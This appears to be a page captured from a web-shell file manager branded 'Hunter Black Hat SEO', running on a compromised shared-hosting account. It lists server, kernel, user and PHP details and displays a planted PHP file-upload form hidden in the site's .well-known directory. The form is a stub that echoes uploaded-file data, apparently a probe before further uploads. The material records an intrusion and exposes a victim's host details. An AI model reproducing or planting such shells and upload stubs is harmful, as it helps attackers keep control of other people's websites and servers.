Hunter Black Hat SEO
Server:LiteSpeed
System:Linux server72.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User:senelvus (2293)
PHP:8.2.30
Disabled:NONE
Upload Files
File: /home/senelvus/public_html/.well-known/11.php
<!DOCTYPE html>
<html>
<head>
    <title>File Uploader</title>
</head>
<body style="font-family: monospace;">

<form method="post" enctype="multipart/form-data">
    <input type="file" name="a">
    <input type="submit" value="Nyampasu!!!">
</form>

<?php
if (isset($_FILES['a'])) {
    echo '<pre>';
    print_r($_FILES);
    echo '</pre>';
}
?>
</body>
</html>